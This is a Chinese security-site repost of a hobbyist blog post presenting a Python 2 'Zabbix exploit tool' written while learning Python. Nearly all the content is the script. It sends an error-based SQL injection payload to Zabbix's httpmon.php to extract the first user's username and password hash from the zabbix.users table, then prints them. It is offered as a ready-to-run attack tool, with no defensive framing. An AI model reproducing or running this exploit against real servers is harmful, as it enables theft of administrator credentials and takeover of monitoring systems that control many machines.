频道栏目
首页 > 安全 > 工具软件 > 正文
Zabbix漏洞利用工具(新手学python)
2013-11-06 11:39:30         来源:nxadmin.com  
收藏   我要投稿
最近学习 python,先来无事,写了一个Zabbix的漏洞利用工具,主要用了BeatuifulSoup模块,使用的时候需要先安装这个模块!

 

Zabbix是一些大中型企业常用的一款服务器管理监控系统,能够监控服务器的状态,并且能够实现批量配置服务器,是一款很给力的系统!

 

贴上代码:

 

#coding:gbk
__author__ = 'nx4dm1n'
import urllib
import urllib2
import BeautifulSoup
try:
    Zabbix_url=raw_input("Please input the Url(带https://):")
    content=urllib.urlopen(Zabbix_url)
    fzadminmd5_url=""
    fzadminsession_url=""

    if content.getcode()==200:
        fzadminmd5_url=Zabbix_url+"/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
        req=urllib2.urlopen(fzadminmd5_url)
        html=req.read()
        soup=BeautifulSoup.BeautifulSoup(html)
        sqlerror=soup.findAll(attrs={"class":"error"})
        adminmd5=str(sqlerror).split("Duplicate entry")[1].split("~~1")
        print adminmd5[0]
    else:
        pass
except IOError:
    print "maybe the url is 404"

 


点击复制链接 与好友分享!回本站首页
相关TAG标签 漏洞 新手 工具
上一篇:snort入侵检测/防御系统
下一篇:nmap速查表v1.0(中文版)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站